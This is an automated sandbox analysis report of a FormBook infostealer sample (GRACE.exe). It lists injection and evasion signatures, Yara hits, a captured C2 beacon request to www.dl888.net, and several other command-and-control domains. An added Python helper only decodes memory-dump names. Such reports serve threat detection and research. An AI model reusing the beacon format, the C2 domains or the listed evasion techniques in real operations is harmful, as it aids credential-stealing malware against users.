Analysis Report GRACE.exe

Overview

General Information

Sample Name: GRACE.exe
Analysis ID: 344817
MD5: 9034acbb2742281523525d715a4ee566
SHA1: 605948c4bcd7a0290e46a37d841a09ab43fbec86
SHA256: cd63e20a002279934bc2ed4887d77605686a79f28f8114f9c01b678754a1e10a
Tags: COVID-19, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 10.2.AddInProcess32.exe.400000.0.unpack Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", 
"0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
Multi AV Scanner detection for submitted file
Source: GRACE.exe Virustotal: Detection: 62% Perma Link
Source: GRACE.exe Metadefender: Detection: 16% Perma Link
Source: GRACE.exe ReversingLabs: Detection: 43%
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: GRACE.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 10.2.AddInProcess32.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
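The Yara matches above are identified only by Joe Sandbox memory-dump names, which pack the process, the snapshot time, the region base and its page protection into one token. The decoder below is an added example for reading them, not Joe Sandbox code. It assumes the dump-name layout <pid>.<phase>.<dumpid>.<base>.<protect>.<type>.sdmp with the PID and base address in hexadecimal and the fifth field a Win32 PAGE_* protection constant, maps PIDs to process names using the "10.2.AddInProcess32.exe" and "17_2_..." (netsh.exe) identifiers that appear elsewhere in this report, and treats the phase values 0/2/3 as process start/end/during run (also an assumption). Run over the eight MEMORY hits it shows that GRACE.exe only ever holds the FormBook payload in PAGE_READWRITE memory, while AddInProcess32.exe (with a hit at its image base 0x400000, the hollowed image) and netsh.exe hold it in PAGE_EXECUTE_READWRITE regions, i.e. those two are the processes that actually run it.

```python
"""Decode the memory-dump identifiers attached to the Yara hits in this report.

Added example for reading Joe Sandbox output; it is not Joe Sandbox code.
Assumed layout: <pid>.<phase>.<dumpid>.<base>.<protect>.<type>.sdmp with
<pid> and <base> in hex and <protect> a Win32 PAGE_* constant.
"""
import re

# Win32 page-protection constants (winnt.h); any of bits 0x10-0x80 means executable.
PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

# Assumed meaning of the <phase> field: 0 = process start, 2 = process end, 3 = during run.
PHASE = {0: "start", 2: "end", 3: "during"}

# PIDs taken from this report's own identifiers (decimal in "10.2.AddInProcess32.exe",
# "17_2_..." for netsh.exe, "0_2_..." for GRACE.exe; hex in the dump names).
PROCESS_NAMES = {0: "GRACE.exe", 10: "AddInProcess32.exe", 16: "explorer.exe", 17: "netsh.exe"}

DUMP_RE = re.compile(
    r"(?P<pid>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<type>[0-9A-F]{8})\.sdmp"
)

# The eight MEMORY hits copied from the "Yara detected FormBook" signature above.
REPORT_LINES = [
    "Source: Yara match File source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY",
]


def parse_dump_id(token):
    """Split one dump identifier into pid, process name, phase, base address and protection."""
    m = DUMP_RE.fullmatch(token)
    if m is None:
        raise ValueError(f"not a dump identifier: {token!r}")
    pid = int(m["pid"], 16)
    protect = int(m["protect"], 16)
    return {
        "pid": pid,
        "process": PROCESS_NAMES.get(pid, f"pid {pid}"),
        "phase": PHASE.get(int(m["phase"], 16), m["phase"]),
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
        "executable": bool(protect & 0xF0),
    }


def yara_hits(lines):
    """Decode every dump identifier found in the given report lines, in order."""
    return [parse_dump_id(m.group(0)) for line in lines for m in DUMP_RE.finditer(line)]


def executable_hosts(lines):
    """Processes in which FormBook was matched inside executable memory (sorted by name)."""
    return sorted({h["process"] for h in yara_hits(lines) if h["executable"]})


def data_only_hosts(lines):
    """Processes whose every match sits in non-executable memory (payload held as data)."""
    by_proc = {}
    for h in yara_hits(lines):
        by_proc.setdefault(h["process"], []).append(h["executable"])
    return sorted(p for p, flags in by_proc.items() if not any(flags))


if __name__ == "__main__":
    for h in yara_hits(REPORT_LINES):
        print(f'{h["process"]:20} {h["phase"]:6} {h["base"]:#012x} {h["protect"]}')
    print("runs FormBook code:  ", executable_hosts(REPORT_LINES))
    print("holds it only as data:", data_only_hosts(REPORT_LINES))
```

The PROCESS_NAMES table and the phase decoding are the two assumptions; for another report, rebuild the table from that report's own "<pid>_<phase>_<address>" and "<pid>.<phase>.<name>" identifiers before trusting the process column.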

Compliance:

Uses 32bit PE files
Source: GRACE.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: GRACE.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Binary contains paths to debug symbols
Source: Binary string: AddInProcess32.pdb source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: netsh.pdb source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000A.00000002.327825504.0000000001310000.00000040.00000001.sdmp, netsh.exe, 00000011.00000002.627626275.00000000037EF000.00000040.00000001.sdmp
Source: Binary string: netsh.pdbGCTL source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: AddInProcess32.exe, netsh.exe
Source: Binary string: AddInProcess32.pdbpw source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000A.00000000.284703831.00000000008E2000.00000002.00020000.sdmp, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_06CE6640
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_06CE82D8
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_06CE7380
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_06CE7380
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then jmp 06CE2656h 0_2_06CE1E89
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov esp, ebp 0_2_06CEDF0A
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then xor edx, edx 0_2_06CE72AC
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then xor edx, edx 0_2_06CE72B8
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_06CE937F
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_06CE7374
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_06CE7374
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_06CE7054
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_06CE7054
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_06CE7060
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_06CE7060
Source: C:\Users\user\Desktop\GRACE.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_06CE6B7C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 10_2_00416BF3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 10_2_00416C07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 10_2_00416C27
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 10_2_00416C3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 4x nop then pop edi 10_2_00417D68
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 17_2_00D16BF3
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 17_2_00D16C07
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 17_2_00D16C3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 17_2_00D16C27
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 17_2_00D17D68

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
GET /jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc HTTP/1.1
Host: www.dl888.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii: (seven NUL bytes, no printable text)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
Source: unknown DNS traffic detected: queries for: www.dl888.net
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 27 Jan 2021 06:58:37 GMT
Connection: close
Data Raw (truncated in the capture): 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 47 42 32 33 31 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 68 31 3e 0d 0a c4 fa d5 fd d4 da cb d1 cb f7 b5 c4 d2 b3 c3 e6 bf c9 c4 dc d2 d1 be ad c9 be b3 fd a1 a2 b8 fc c3 fb bb f2 d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e c7 eb b3 a2 ca d4 d2 d4 cf c2 b2 d9 d7 f7 a3 ba 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e c8 b7 b1 a3 e4 af c0 c0 c6 f7 b5 c4 b5 d8 d6 b7 c0 b8 d6 d0 cf d4 ca be b5 c4 cd f8 d5 be b5 d8 d6 b7 b5 c4 c6 b4 d0 b4 ba cd b8 f1 ca bd d5 fd c8 b7 ce de ce f3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e c8 e7 b9 fb cd a8 b9 fd b5 a5 bb f7 c1 b4 bd d3 b6 f8 b5 bd b4 ef c1 cb b8 c3 cd f8 d2 b3 a3 ac c7 eb d3 eb cd f8 d5 be b9 dc c0 ed d4 b1 c1 aa cf b5 a3 ac cd a8 d6 aa cb fb c3 c7 b8 c3 c1 b4 bd d3 b5 c4 b8 f1 ca bd b2 bb d5 fd c8 b7 a1 a3 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e b5 a5 bb f7 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e ba f3 cd cb 3c 2f 61 3e b0 b4 c5 a5 b3 a2 ca d4 c1 ed d2 bb b8 f6 c1 b4 bd d3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 b4 ed ce f3 20 34 30 34 20 2d 20 ce c4 bc fe bb f2 c4 bf c2 bc ce b4 d5 d2 b5 bd a1 a3 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 d0 c5 cf a2 b7 fe ce f1 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e bc bc ca f5 d0 c5 cf a2 a3 a8 ce aa bc bc ca f5 d6 a7 b3 d6 c8 cb d4 b1 cc e1 b9 a9 a3 a9 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e d7
Data Ascii (decoded from GB2312 and translated; this is the stock Microsoft IIS 6.0 Chinese-language 404 page):
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css"> BODY { font: 9pt/12pt SimSun } H1 { font: 12pt/15pt SimSun } H2 { font: 9pt/12pt SimSun } A:link { color: red } A:visited { color: maroon } </STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>(remainder cut off in the capture)
Note: www.dl888.net was the only candidate domain resolved and contacted in this run, and it answered the beacon path with a default IIS 404, so the sample received no C2 response during the analysis; the remaining domains in the decoded list below were not exercised.
Source: explorer.exe, 00000010.00000003.552552225.000000000F704000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp String found in binary or memory: http://ns.adb
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmp String found in binary or memory: http://ns.ado/1
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.c/g
Source: GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cobj
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/WebPage
Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.11sxsx.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.11sxsx.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.11sxsx.com/jqc/www.luxusgrotte.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.11sxsx.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.dl888.net
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.dl888.net/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.dl888.net/jqc/www.hongreng.xyz
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.dl888.netReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.fitdramas.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.fitdramas.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.fitdramas.com/jqc/www.szyulics.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.fitdramas.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hongreng.xyz
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hongreng.xyz/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hongreng.xyz/jqc/www.hotvidzhub.download
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hongreng.xyzReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotvidzhub.download
